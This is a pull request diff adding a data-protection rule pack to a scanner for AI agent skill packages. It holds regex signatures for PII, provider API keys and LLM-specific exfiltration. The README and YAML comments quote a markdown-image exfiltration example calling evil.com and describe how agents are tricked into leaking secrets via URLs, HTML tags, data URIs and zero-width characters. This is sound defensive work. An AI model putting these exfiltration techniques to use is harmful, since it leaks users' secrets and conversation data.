### PR TITLE
feat: add PromptGuard data protection rule pack - PII, secrets, LLM exfiltration

### DIFF
--- a/skill_scanner/data/packs/promptguard/README.md
+++ b/skill_scanner/data/packs/promptguard/README.md
@@ -1,0 +1,91 @@
+# PromptGuard Data Protection Rule Pack
+
+**Source:** [PromptGuard](https://github.com/promptguard/promptguard)
+**Version:** 1.0.0
+**Rules:** 26 signatures across 3 signature files
+
+## Overview
+
+This pack adds data protection detection rules from the open-source PromptGuard project that are **not covered** by Cisco's built-in skill scanner ruleset or the ATR community pack. The rules target three categories with zero or minimal existing coverage.
+
+## Gap Analysis
+
+| Category | Core pack | ATR pack | This pack |
+|----------|-----------|----------|-----------|
+| PII detection | 0 rules | 0 rules | **8 rules** |
+| Secret providers | 8 providers | 0 | **12 providers** |
+| LLM-context exfiltration | Python/JS network calls | 1 (disguised analytics) | **6 rules** |
+
+## Attack Categories
+
+### 1. PII Detection (`pii_detection.yaml` — 8 rules)
+
+Neither Cisco's core pack nor the ATR pack detect PII in skill packages. Skills containing real SSNs, credit card numbers, or instructions to harvest PII from users represent serious data protection risks.
+
+| Rule ID | Severity | Description |
+|---------|----------|-------------|
+| PG_PII_SSN | CRITICAL | US Social Security Number embedded in skill files |
+| PG_PII_CREDIT_CARD | CRITICAL | Credit card number (Visa, MC, Amex, Discover) |
+| PG_PII_IBAN | HIGH | International Bank Account Number |
+| PG_PII_PHONE_HARVESTING | HIGH | Instructions to collect phone numbers from users |
+| PG_PII_SSN_HARVESTING | CRITICAL | Instructions to collect SSNs/national IDs |
+| PG_PII_CARD_HARVESTING | CRITICAL | Instructions to collect credit card details |
+| PG_PII_CREDENTIAL_HARVESTING | CRITICAL | Instructions to collect passwords/credentials |
+| PG_PII_MEDICAL_ID | HIGH | Medicare Beneficiary Identifier (HIPAA PHI) |
+
+### 2. Extended Secret Providers (`secret_providers.yaml` — 12 rules)
+
+Cisco's core pack detects 8 secret providers (AWS, Stripe, Google, GitHub, JWT, private keys, passwords, connection strings). This pack adds 12 providers common in AI/agent deployments that are not covered.
+
+| Rule ID | Severity | Description |
+|---------|----------|-------------|
+| PG_SECRET_OPENAI_KEY | CRITICAL | OpenAI API key (sk-..., sk-proj-...) |
+| PG_SECRET_ANTHROPIC_KEY | CRITICAL | Anthropic API key (sk-ant-...) |
+| PG_SECRET_SLACK_TOKEN | CRITICAL | Slack bot/user/app token |
+| PG_SECRET_SLACK_WEBHOOK | HIGH | Slack incoming webhook URL |
+| PG_SECRET_HUGGINGFACE_TOKEN | HIGH | Hugging Face access token (hf_...) |
+| PG_SECRET_TWILIO_KEY | HIGH | Twilio API key or auth token |
+| PG_SECRET_SENDGRID_KEY | HIGH | SendGrid API key (SG....) |
+| PG_SECRET_NPM_TOKEN | CRITICAL | npm access token (supply chain risk) |
+| PG_SECRET_PYPI_TOKEN | CRITICAL | PyPI API token (supply chain risk) |
+| PG_SECRET_DISCORD_TOKEN | CRITICAL | Discord bot token |
+| PG_SECRET_AZURE_KEY | CRITICAL | Azure Cognitive Services / Azure OpenAI key |
+| PG_SECRET_DIGITALOCEAN_TOKEN | CRITICAL | DigitalOcean personal access token |
+
+### 3. LLM-Context Exfiltration (`markdown_exfiltration.yaml` — 6 rules)
+
+Cisco's core pack detects exfiltration via Python/JS network calls. These rules detect LLM-specific exfiltration vectors that exploit the agent's ability to render markdown, construct URLs, or encode data — techniques invisible to network-level detection.
+
+| Rule ID | Severity | Description |
+|---------|----------|-------------|
+| PG_EXFIL_MARKDOWN_IMAGE | CRITICAL | `![](https://evil.com?d=SECRET)` — image URL with stolen data |
+| PG_EXFIL_MARKDOWN_LINK | HIGH | Markdown link smuggling data in constructed URLs |
+| PG_EXFIL_HTML_TAG | HIGH | HTML `<img>/<script>` injection with dynamic URLs |
+| PG_EXFIL_DATA_URI | HIGH | `data:text/html;base64,...` executable payload smuggling |
+| PG_EXFIL_URL_ENCODING | HIGH | Instructions to encode secrets/context into URL parameters |
+| PG_EXFIL_INVISIBLE_PAYLOAD | CRITICAL | Zero-width character steganography for covert data channels |
+
+## File Structure
+
+```
+skill_scanner/data/packs/promptguard/
+├── pack.yaml                              # Pack manifest with all 26 rule entries
+├── README.md                              # This file
+└── signatures/
+    ├── pii_detection.yaml                 # 8 PII detection rules
+    ├── secret_providers.yaml              # 12 secret provider rules
+    └── markdown_exfiltration.yaml         # 6 LLM-context exfiltration rules
+```
+
+## Design Principles
+
+- **Zero overlap** — Every rule detects something the core pack and ATR pack do not.
+- **Data-only** — No Python code, no existing file modifications.
+- **High precision** — Patterns use strict formats with exclude lists to minimize false positives.
+- **Agent-relevant** — PII harvesting and markdown exfil rules target threats specific to AI agent skill packages, not generic static analysis.
+
+## PromptGuard Project Links
+
+- Repository: https://github.com/promptguard/promptguard
+- Documentation: https://docs.promptguard.co
+- License: Apache-2.0

--- a/skill_scanner/data/packs/promptguard/pack.yaml
+++ b/skill_scanner/data/packs/promptguard/pack.yaml
@@ -1,0 +1,191 @@
+# PromptGuard Data Protection Rule Pack for Cisco Skill Scanner
+# Source: https://github.com/promptguard/promptguard
+# Version: 1.0.0
+# These rules fill detection gaps in Cisco's core ruleset and the ATR pack.
+# Focus areas: PII detection, extended secret providers, LLM-context exfiltration.
+
+pack:
+  id: promptguard
+  name: "PromptGuard Data Protection Rules"
+  version: "1.0.0"
+  description: >
+    Open-source data protection detection rules from the PromptGuard project.
+    Covers three categories absent from Cisco's core pack and the ATR community
+    pack: (1) PII detection — SSNs, credit cards, IBANs, and credential
+    harvesting instructions with zero coverage today; (2) extended secret
+    providers — OpenAI, Anthropic, Slack, HuggingFace, npm, PyPI, and 6 more
+    providers beyond the 8 in Cisco's core pack; (3) LLM-context exfiltration —
+    markdown image/link exfil, HTML tag injection, data URI smuggling, and
+    invisible payload encoding that bypass network-level detection.
+    26 rules across 3 signature files.
+  author: "PromptGuard"
+  license: "Apache-2.0"
+  source_url: "https://github.com/promptguard/promptguard"
+  signature_files:
+    - signatures/pii_detection.yaml
+    - signatures/secret_providers.yaml
+    - signatures/markdown_exfiltration.yaml
+
+rules:
+
+  # ─── PII Detection (pii_detection.yaml) ──────────────────────────────────
+
+  - id: PG_PII_SSN
+    file: signatures/pii_detection.yaml
+    severity: CRITICAL
+    category: pii_exposure
+    description: "US Social Security Number embedded in skill package."
+
+  - id: PG_PII_CREDIT_CARD
+    file: signatures/pii_detection.yaml
+    severity: CRITICAL
+    category: pii_exposure
+    description: "Credit card number (Visa, MC, Amex, Discover) in skill package."
+
+  - id: PG_PII_IBAN
+    file: signatures/pii_detection.yaml
+    severity: HIGH
+    category: pii_exposure
+    description: "International Bank Account Number (IBAN) in skill package."
+
+  - id: PG_PII_PHONE_HARVESTING
+    file: signatures/pii_detection.yaml
+    severity: HIGH
+    category: pii_exposure
+    description: "Skill instructions to collect phone numbers from users."
+
+  - id: PG_PII_SSN_HARVESTING
+    file: signatures/pii_detection.yaml
+    severity: CRITICAL
+    category: pii_exposure
+    description: "Skill instructions to collect Social Security Numbers."
+
+  - id: PG_PII_CARD_HARVESTING
+    file: signatures/pii_detection.yaml
+    severity: CRITICAL
+    category: pii_exposure
+    description: "Skill instructions to collect credit card details."
+
+  - id: PG_PII_CREDENTIAL_HARVESTING
+    file: signatures/pii_detection.yaml
+    severity: CRITICAL
+    category: pii_exposure
+    description: "Skill instructions to collect passwords or credentials."
+
+  - id: PG_PII_MEDICAL_ID
+    file: signatures/pii_detection.yaml
+    severity: HIGH
+    category: pii_exposure
+    description: "US Medicare Beneficiary Identifier (HIPAA-protected PHI)."
+
+  # ─── Extended Secret Providers (secret_providers.yaml) ───────────────────
+
+  - id: PG_SECRET_OPENAI_KEY
+    file: signatures/secret_providers.yaml
+    severity: CRITICAL
+    category: hardcoded_secrets
+    description: "Hardcoded OpenAI API key (sk-..., sk-proj-..., sk-svcacct-...)."
+
+  - id: PG_SECRET_ANTHROPIC_KEY
+    file: signatures/secret_providers.yaml
+    severity: CRITICAL
+    category: hardcoded_secrets
+    description: "Hardcoded Anthropic API key (sk-ant-...)."
+
+  - id: PG_SECRET_SLACK_TOKEN
+    file: signatures/secret_providers.yaml
+    severity: CRITICAL
+    category: hardcoded_secrets
+    description: "Hardcoded Slack bot/user/app token (xoxb-/xoxp-/xapp-)."
+
+  - id: PG_SECRET_SLACK_WEBHOOK
+    file: signatures/secret_providers.yaml
+    severity: HIGH
+    category: hardcoded_secrets
+    description: "Hardcoded Slack incoming webhook URL."
+
+  - id: PG_SECRET_HUGGINGFACE_TOKEN
+    file: signatures/secret_providers.yaml
+    severity: HIGH
+    category: hardcoded_secrets
+    description: "Hardcoded Hugging Face access token (hf_...)."
+
+  - id: PG_SECRET_TWILIO_KEY
+    file: signatures/secret_providers.yaml
+    severity: HIGH
+    category: hardcoded_secrets
+    description: "Hardcoded Twilio API key or auth token."
+
+  - id: PG_SECRET_SENDGRID_KEY
+    file: signatures/secret_providers.yaml
+    severity: HIGH
+    category: hardcoded_secrets
+    description: "Hardcoded SendGrid API key (SG....)."
+
+  - id: PG_SECRET_NPM_TOKEN
+    file: signatures/secret_providers.yaml
+    severity: CRITICAL
+    category: hardcoded_secrets
+    description: "Hardcoded npm access token (npm_...)."
+
+  - id: PG_SECRET_PYPI_TOKEN
+    file: signatures/secret_providers.yaml
+    severity: CRITICAL
+    category: hardcoded_secrets
+    description: "Hardcoded PyPI API token (pypi-...)."
+
+  - id: PG_SECRET_DISCORD_TOKEN
+    file: signatures/secret_providers.yaml
+    severity: CRITICAL
+    category: hardcoded_secrets
+    description: "Hardcoded Discord bot token."
+
+  - id: PG_SECRET_AZURE_KEY
+    file: signatures/secret_providers.yaml
+    severity: CRITICAL
+    category: hardcoded_secrets
+    description: "Hardcoded Azure Cognitive Services or Azure OpenAI key."
+
+  - id: PG_SECRET_DIGITALOCEAN_TOKEN
+    file: signatures/secret_providers.yaml
+    severity: CRITICAL
+    category: hardcoded_secrets
+    description: "Hardcoded DigitalOcean personal access token (dop_v1_...)."
+
+  # ─── LLM-Context Exfiltration (markdown_exfiltration.yaml) ──────────────
+
+  - id: PG_EXFIL_MARKDOWN_IMAGE
+    file: signatures/markdown_exfiltration.yaml
+    severity: CRITICAL
+    category: data_exfiltration
+    description: "Markdown image tag exfiltrating data via URL query parameters."
+
+  - id: PG_EXFIL_MARKDOWN_LINK
+    file: signatures/markdown_exfiltration.yaml
+    severity: HIGH
+    category: data_exfiltration
+    description: "Markdown link smuggling sensitive data in constructed URLs."
+
+  - id: PG_EXFIL_HTML_TAG
+    file: signatures/markdown_exfiltration.yaml
+    severity: HIGH
+    category: data_exfiltration
+    description: "HTML tag injection with dynamic URL for data exfiltration."
+
+  - id: PG_EXFIL_DATA_URI
+    file: signatures/markdown_exfiltration.yaml
+    severity: HIGH
+    category: data_exfiltration
+    description: "Data URI with executable MIME type (script/HTML smuggling)."
+
+  - id: PG_EXFIL_URL_ENCODING
+    file: signatures/markdown_exfiltration.yaml
+    severity: HIGH
+    category: data_exfiltration
+    description: "Instructions to encode secrets/context into URLs for exfiltration."
+
+  - id: PG_EXFIL_INVISIBLE_PAYLOAD
+    file: signatures/markdown_exfiltration.yaml
+    severity: CRITICAL
+    category: data_exfiltration
+    description: "Steganographic encoding to hide exfiltrated data in invisible characters."

--- a/skill_scanner/data/packs/promptguard/signatures/markdown_exfiltration.yaml
+++ b/skill_scanner/data/packs/promptguard/signatures/markdown_exfiltration.yaml
@@ -1,0 +1,135 @@
+# PromptGuard Data Protection Pack — LLM-Context Exfiltration Signatures
+# Source: https://github.com/promptguard/promptguard
+# Detects data exfiltration vectors specific to LLM/agent skill contexts.
+# These attacks exploit the agent's ability to render markdown, construct URLs,
+# or encode data in ways that bypass traditional network-level exfil detection.
+# Cisco's core pack covers Python/JS network calls but not these LLM-specific vectors.
+
+signatures:
+
+  - id: PG_EXFIL_MARKDOWN_IMAGE
+    category: data_exfiltration
+    severity: CRITICAL
+    patterns:
+      # Markdown image tags with dynamic data in the URL — classic LLM exfil vector
+      # Agent is tricked into rendering ![](https://evil.com/steal?data=<SECRET>)
+      - "!\\[([^\\]]*)\\]\\(https?://[^)]{0,200}\\{\\{?[^}]+\\}\\}?[^)]*\\)"
+      - "!\\[([^\\]]*)\\]\\(https?://[^)]{0,200}\\$\\{[^}]+\\}[^)]*\\)"
+      - "!\\[([^\\]]*)\\]\\(https?://[^)]{0,200}\\$[A-Za-z_][A-Za-z0-9_]*[^)]*\\)"
+      # Instructions to construct exfil URLs via markdown images
+      - "(?i)(render|display|show|output|create|generate|insert|embed)\\s+(a\\s+)?(?:markdown\\s+)?(?:image|img|picture)\\s+(?:with|where|containing|that\\s+includes?)\\s+.{0,80}(data|secret|key|token|password|env|variable|context|conversation|history|message)"
+    file_types: [markdown, text]
+    description: >
+      Markdown image exfiltration pattern detected. This attack tricks an LLM
+      agent into rendering a markdown image tag whose URL contains sensitive
+      data as query parameters. When the image is rendered, the data is sent
+      to an attacker-controlled server. This is one of the most common
+      LLM-specific exfiltration vectors and is not covered by Cisco's core
+      network-level exfil rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove instructions that construct markdown images with dynamic data in
+      URLs. Implement output sanitization to strip or block markdown images
+      with variable interpolation in URLs.
+
+  - id: PG_EXFIL_MARKDOWN_LINK
+    category: data_exfiltration
+    severity: HIGH
+    patterns:
+      # Markdown links with template variables in URLs
+      - "\\[([^\\]]*)\\]\\(https?://[^)]{0,200}\\{\\{?[^}]+\\}\\}?[^)]*\\)"
+      - "(?i)(create|generate|render|output|insert)\\s+(a\\s+)?(?:markdown\\s+)?(?:link|hyperlink|anchor|url)\\s+.{0,60}(contain|include|embed|encode|append|attach)\\s+.{0,60}(data|secret|key|token|password|env|context|conversation|history)"
+    exclude_patterns:
+      # Legitimate template documentation
+      - "(?i)documentation"
+      - "(?i)template\\s+example"
+      - "(?i)mustache"
+      - "(?i)handlebars"
+    file_types: [markdown, text]
+    description: >
+      Markdown link exfiltration pattern detected. Similar to image exfil but
+      uses clickable links to smuggle data in URLs. The agent constructs a
+      link whose URL encodes sensitive context data.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove instructions that embed sensitive data in markdown link URLs.
+      Review all dynamically constructed URLs for data leakage.
+
+  - id: PG_EXFIL_HTML_TAG
+    category: data_exfiltration
+    severity: HIGH
+    patterns:
+      # HTML img/script/iframe tags with dynamic data in src attributes
+      - "<img\\s+[^>]*src\\s*=\\s*[\"']https?://[^\"']{0,200}\\{\\{?[^}]+\\}\\}?[^\"']*[\"'][^>]*/?>|<img\\s+[^>]*src\\s*=\\s*[\"']https?://[^\"']{0,200}\\$\\{[^}]+\\}[^\"']*[\"'][^>]*/?>"
+      - "<(?:script|iframe|embed|object)\\s+[^>]*src\\s*=\\s*[\"']https?://[^\"']{0,300}[\"'][^>]*>"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)documentation"
+      - "(?i)tutorial"
+    file_types: [markdown, text, javascript, typescript]
+    description: >
+      HTML tag injection with dynamic URL construction. Embeds sensitive data
+      in img/script/iframe src attributes to exfiltrate via HTTP requests
+      triggered when the content is rendered.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Strip or escape HTML tags in skill content. Block skills that inject
+      raw HTML with external resource references.
+
+  - id: PG_EXFIL_DATA_URI
+    category: data_exfiltration
+    severity: HIGH
+    patterns:
+      # data: URIs with base64-encoded payloads — can smuggle data or execute scripts
+      - "data:(?:text/html|application/javascript|text/javascript|application/x-javascript);base64,[A-Za-z0-9+/=]{50,}"
+      # Instructions to encode and embed data in URIs
+      - "(?i)(encode|convert|transform|serialize)\\s+.{0,40}(to|as|into)\\s+.{0,20}(data\\s*(?::|URI)|base64\\s+(?:URI|url|data))"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)documentation"
+      - "(?i)data:image/"
+    file_types: [markdown, text, python, javascript, typescript]
+    description: >
+      Data URI with executable MIME type detected. Data URIs with text/html
+      or JavaScript MIME types can execute scripts or render hidden content
+      to exfiltrate data without making visible network requests.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Block data URIs with executable MIME types. Only allow data:image/* URIs
+      if image embedding is needed.
+
+  - id: PG_EXFIL_URL_ENCODING
+    category: data_exfiltration
+    severity: HIGH
+    patterns:
+      # Instructions to encode sensitive data into URLs
+      - "(?i)(append|add|include|embed|encode|put|insert|concatenate)\\s+.{0,60}(secret|password|token|api[_-]?key|credential|env|environment|context|conversation|history|system\\s+prompt|instruction)\\s+.{0,40}(to|in|into|as|within)\\s+.{0,30}(url|URI|link|query|parameter|endpoint|request)"
+      - "(?i)(url|URI|link|query|parameter|endpoint)\\s+.{0,40}(contain|include|embed|encode|carry|transmit)\\s+.{0,60}(secret|password|token|api[_-]?key|credential|env|context|conversation|system\\s+prompt)"
+    file_types: [markdown, text]
+    description: >
+      Instructions to encode sensitive data into URLs for exfiltration. The
+      skill directs the agent to construct URLs containing secrets, API keys,
+      or conversation context as query parameters or path segments.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove all instructions that direct the agent to embed sensitive data
+      in URLs. Review the skill's data flow for unauthorized external
+      communication channels.
+
+  - id: PG_EXFIL_INVISIBLE_PAYLOAD
+    category: data_exfiltration
+    severity: CRITICAL
+    patterns:
+      # Instructions to hide exfiltration in invisible/whitespace/zero-width content
+      - "(?i)(hide|conceal|obscure|mask|cloak|disguise|camouflage|make\\s+invisible)\\s+.{0,60}(data|exfil|secret|key|token|password|context|output|response|payload|content)\\s+.{0,40}(in|within|inside|using|via|through)\\s+.{0,40}(whitespace|zero[- ]?width|invisible|hidden|unicode|steganograph|comment)"
+      - "(?i)(use|embed|encode|place|insert)\\s+.{0,40}(zero[- ]?width|invisible|hidden|unicode)\\s+.{0,40}(character|char|text|encoding)\\s+.{0,40}(to|for)\\s+.{0,40}(transmit|send|exfil|leak|smuggle|extract|hide)"
+    file_types: [markdown, text, python, javascript, typescript]
+    description: >
+      Instructions to use invisible characters or steganographic encoding to
+      hide exfiltrated data. This technique uses zero-width Unicode characters,
+      whitespace encoding, or HTML comments to create covert data channels
+      invisible to human reviewers.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove all steganographic encoding instructions. Implement zero-width
+      character stripping on skill output.

--- a/skill_scanner/data/packs/promptguard/signatures/pii_detection.yaml
+++ b/skill_scanner/data/packs/promptguard/signatures/pii_detection.yaml
@@ -1,0 +1,180 @@
+# PromptGuard Data Protection Pack — PII Detection Signatures
+# Source: https://github.com/promptguard/promptguard
+# Detects personally identifiable information embedded in skill packages.
+# Cisco's core pack and ATR pack have zero PII detection rules.
+
+signatures:
+
+  - id: PG_PII_SSN
+    category: pii_exposure
+    severity: CRITICAL
+    patterns:
+      # US Social Security Number — strict XXX-XX-XXXX / XXX XX XXXX format
+      # Excludes 000, 666, 900-999 area numbers per SSA rules
+      - "(?<![0-9])(?!000|666|9\\d{2})[0-8]\\d{2}[- ](?!00)\\d{2}[- ](?!0000)\\d{4}(?![0-9])"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+      - "(?i)dummy"
+      - "(?i)sample"
+      - "(?i)123-45-6789"
+      - "(?i)xxx-xx-xxxx"
+      - "(?i)format"
+      - "(?i)regex"
+      - "(?i)pattern"
+    file_types: [markdown, python, bash, javascript, typescript, text, json, yaml]
+    description: >
+      US Social Security Number detected in skill package. Skills should never
+      contain real SSNs. This indicates either leaked PII or a skill designed
+      to process/store SSNs without appropriate safeguards.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove all real SSNs from skill files. If the skill legitimately processes
+      SSNs, ensure it uses tokenization or masking and never stores raw values.
+
+  - id: PG_PII_CREDIT_CARD
+    category: pii_exposure
+    severity: CRITICAL
+    patterns:
+      # Visa (4xxx), Mastercard (5[1-5]xx, 2[2-7]xx), Amex (3[47]xx), Discover (6011, 65xx)
+      - "(?<![0-9])4[0-9]{3}[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}(?![0-9])"
+      - "(?<![0-9])5[1-5][0-9]{2}[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}(?![0-9])"
+      - "(?<![0-9])3[47][0-9]{2}[- ]?[0-9]{6}[- ]?[0-9]{5}(?![0-9])"
+      - "(?<![0-9])6(?:011|5[0-9]{2})[- ]?[0-9]{4}[- ]?[0-9]{4}[- ]?[0-9]{4}(?![0-9])"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)test"
+      - "(?i)placeholder"
+      - "(?i)dummy"
+      - "(?i)sample"
+      - "(?i)4111.?1111.?1111.?1111"
+      - "(?i)4242.?4242.?4242.?4242"
+      - "(?i)5500.?0000.?0000.?0004"
+      - "(?i)xxxx"
+      - "(?i)format"
+      - "(?i)regex"
+      - "(?i)pattern"
+      # Timestamps and version numbers
+      - "\\d{4}-\\d{2}-\\d{2}T"
+      - "v\\d+\\.\\d+"
+    file_types: [markdown, python, bash, javascript, typescript, text, json, yaml]
+    description: >
+      Credit card number detected in skill package. Skills should never contain
+      real payment card numbers. This violates PCI-DSS and indicates leaked
+      financial PII or a credential harvesting skill.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove all payment card numbers immediately. Use tokenized or masked
+      values (e.g., ****-****-****-1234) for display purposes.
+
+  - id: PG_PII_IBAN
+    category: pii_exposure
+    severity: HIGH
+    patterns:
+      # International Bank Account Number — 2 letter country + 2 check digits + up to 30 alphanum
+      - "(?<![A-Za-z])(?:AL|AD|AT|AZ|BH|BY|BE|BA|BR|BG|CR|HR|CY|CZ|DK|DO|TL|EE|FO|FI|FR|GE|DE|GI|GR|GL|GT|HU|IS|IQ|IE|IL|IT|JO|KZ|XK|KW|LV|LB|LY|LI|LT|LU|MK|MT|MR|MU|MC|MD|ME|NL|NO|PK|PS|PL|PT|QA|RO|LC|SM|ST|SA|RS|SC|SK|SI|ES|SE|CH|TN|TR|UA|AE|GB|VA|VG)[0-9]{2}[- ]?[A-Z0-9]{4}[- ]?[A-Z0-9]{4}[- ]?[A-Z0-9]{4}[- ]?[A-Z0-9]{0,18}(?![A-Za-z0-9])"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)test"
+      - "(?i)placeholder"
+      - "(?i)sample"
+      - "(?i)format"
+      - "(?i)IBAN"
+    file_types: [markdown, python, bash, javascript, typescript, text, json, yaml]
+    description: >
+      International Bank Account Number (IBAN) detected in skill package.
+      IBANs are sensitive financial identifiers that should not appear in skill
+      files.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove IBAN values from skill files. Use masked representations for
+      documentation purposes.
+
+  - id: PG_PII_PHONE_HARVESTING
+    category: pii_exposure
+    severity: HIGH
+    patterns:
+      # Skill instructions to collect/extract phone numbers
+      - "(?i)(collect|extract|harvest|gather|scrape|capture|log|record|store|save)\\s+(the\\s+)?(user'?s?|their|customer'?s?|client'?s?)\\s+(phone|mobile|cell|telephone)\\s*(number)?"
+      - "(?i)(ask|request|prompt|require)\\s+(the\\s+)?(user|them|customer|client)\\s+(for|to\\s+provide)\\s+(their\\s+)?(phone|mobile|cell|telephone)\\s*(number)?"
+    file_types: [markdown, text]
+    description: >
+      Skill instructions to collect phone numbers from users. This may indicate
+      a social engineering or credential harvesting skill that requests PII
+      under false pretenses.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Review why the skill collects phone numbers. Remove PII collection
+      instructions unless the skill's documented purpose requires it and
+      appropriate data handling is in place.
+
+  - id: PG_PII_SSN_HARVESTING
+    category: pii_exposure
+    severity: CRITICAL
+    patterns:
+      # Skill instructions to collect SSNs
+      - "(?i)(collect|extract|harvest|gather|capture|log|record|store|save|ask|request|prompt|require)\\s+.{0,40}(social\\s+security|SSN|social\\s+insurance|SIN|national\\s+insurance|NI\\s+number)"
+    file_types: [markdown, text]
+    description: >
+      Skill instructions to collect Social Security Numbers or national ID
+      numbers. This is a strong indicator of credential harvesting or social
+      engineering. Legitimate skills should never request SSNs.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove SSN/national ID collection instructions. Skills should never
+      request government-issued identification numbers.
+
+  - id: PG_PII_CARD_HARVESTING
+    category: pii_exposure
+    severity: CRITICAL
+    patterns:
+      # Skill instructions to collect credit card info
+      - "(?i)(collect|extract|harvest|gather|capture|log|record|store|save|ask|request|prompt|require)\\s+.{0,40}(credit\\s+card|debit\\s+card|card\\s+number|CVV|CVC|expir(y|ation)\\s+date|billing\\s+info)"
+    file_types: [markdown, text]
+    description: >
+      Skill instructions to collect payment card details. This is a strong
+      indicator of financial fraud or credential harvesting. Payment processing
+      should use PCI-compliant tokenization, not raw card collection.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove payment card collection instructions. Use PCI-compliant payment
+      processors (Stripe, Square, etc.) instead of collecting raw card data.
+
+  - id: PG_PII_CREDENTIAL_HARVESTING
+    category: pii_exposure
+    severity: CRITICAL
+    patterns:
+      # Skill instructions to collect passwords or credentials
+      - "(?i)(collect|extract|harvest|gather|capture|log|record|store|save)\\s+.{0,40}(password|passphrase|credential|login|auth(entication)?\\s+(token|code|detail))"
+      - "(?i)(ask|request|prompt|require)\\s+(the\\s+)?(user|them|customer|client)\\s+(for|to\\s+(provide|enter|type|input|share))\\s+(their\\s+)?(password|passphrase|credential|login\\s+detail)"
+    file_types: [markdown, text]
+    description: >
+      Skill instructions to collect passwords or authentication credentials.
+      Skills should never request user passwords. This is a strong indicator of
+      credential harvesting or phishing.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove all credential collection instructions. Use OAuth, SSO, or token-
+      based authentication flows instead of collecting raw passwords.
+
+  - id: PG_PII_MEDICAL_ID
+    category: pii_exposure
+    severity: HIGH
+    patterns:
+      # US Medicare Beneficiary Identifier (MBI) — 11 char alphanumeric
+      - "(?<![A-Za-z0-9])[1-9][AC-HJKMNP-RT-Yac-hjkmnp-rt-y][AC-HJKMNP-RT-Yac-hjkmnp-rt-y0-9][0-9][AC-HJKMNP-RT-Yac-hjkmnp-rt-y][AC-HJKMNP-RT-Yac-hjkmnp-rt-y0-9][0-9][AC-HJKMNP-RT-Yac-hjkmnp-rt-y]{2}[0-9]{2}(?![A-Za-z0-9])"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)test"
+      - "(?i)sample"
+      - "(?i)format"
+    file_types: [markdown, python, bash, javascript, typescript, text, json, yaml]
+    description: >
+      Possible US Medicare Beneficiary Identifier (MBI) detected. Medical
+      identifiers are protected health information (PHI) under HIPAA and should
+      never appear in skill packages.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove all medical identifiers. If the skill processes health data,
+      ensure HIPAA-compliant data handling with proper de-identification.

--- a/skill_scanner/data/packs/promptguard/signatures/secret_providers.yaml
+++ b/skill_scanner/data/packs/promptguard/signatures/secret_providers.yaml
@@ -1,0 +1,244 @@
+# PromptGuard Data Protection Pack — Extended Secret Provider Signatures
+# Source: https://github.com/promptguard/promptguard
+# Detects API keys and tokens from providers not covered by Cisco's core pack.
+# Core covers: AWS, Stripe, Google, GitHub, JWT, private keys, passwords, connection strings.
+# This file adds 12 additional providers common in AI/agent deployments.
+
+signatures:
+
+  - id: PG_SECRET_OPENAI_KEY
+    category: hardcoded_secrets
+    severity: CRITICAL
+    patterns:
+      - "sk-[A-Za-z0-9]{20}T3BlbkFJ[A-Za-z0-9]{20}"
+      - "sk-proj-[A-Za-z0-9_-]{40,}"
+      - "sk-svcacct-[A-Za-z0-9_-]{40,}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+      - "(?i)your.?api.?key"
+      - "(?i)sk-xxxx"
+      - "sk-\\.\\.\\.\\."
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      OpenAI API key detected. OpenAI keys grant access to GPT models and can
+      incur significant costs if leaked. Not covered by Cisco's core secret
+      detection rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded OpenAI key. Use the OPENAI_API_KEY environment
+      variable instead. Rotate the exposed key at https://platform.openai.com/api-keys
+
+  - id: PG_SECRET_ANTHROPIC_KEY
+    category: hardcoded_secrets
+    severity: CRITICAL
+    patterns:
+      - "sk-ant-api03-[A-Za-z0-9_-]{93}"
+      - "sk-ant-[A-Za-z0-9_-]{40,}"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+      - "(?i)your.?api.?key"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      Anthropic API key detected. Anthropic keys grant access to Claude models
+      and can incur costs if leaked. Not covered by Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
+      Remove the hardcoded Anthropic key. Use the ANTHROPIC_API_KEY environment
+      variable. Rotate the key at https://console.anthropic.com/settings/keys
+
+  - id: PG_SECRET_SLACK_TOKEN
+    category: hardcoded_secrets
+    severity: CRITICAL
+    patterns:
+      - "xoxb-[0-9]{10,13}-[0-9]{10,13}-[A-Za-z0-9]{24}"
+      - "xoxp-[0-9]{10,13}-[0-9]{10,13}-[0-9]{10,13}-[a-f0-9]{32}"
+      - "xoxe\\.xoxp-[0-9]+-[0-9]+-[0-9]+-[a-f0-9]+"
+      - "xapp-[0-9]+-[A-Za-z0-9]+-[0-9]+-[a-f0-9]+"
+    exclude_patterns:
+      - "(?i)example"
+      - "(?i)placeholder"
+      - "(?i)test"
+    file_types: [python, bash, markdown, javascript, typescript, text, json, yaml]
+    description: >
+      Slack bot, user, or app token detected. Leaked Slack tokens can expose
+      workspace messages, channels, and files. Not covered by Cisco's core rules.
+      Source: https://github.com/promptguard/promptguard
+    remediation: >
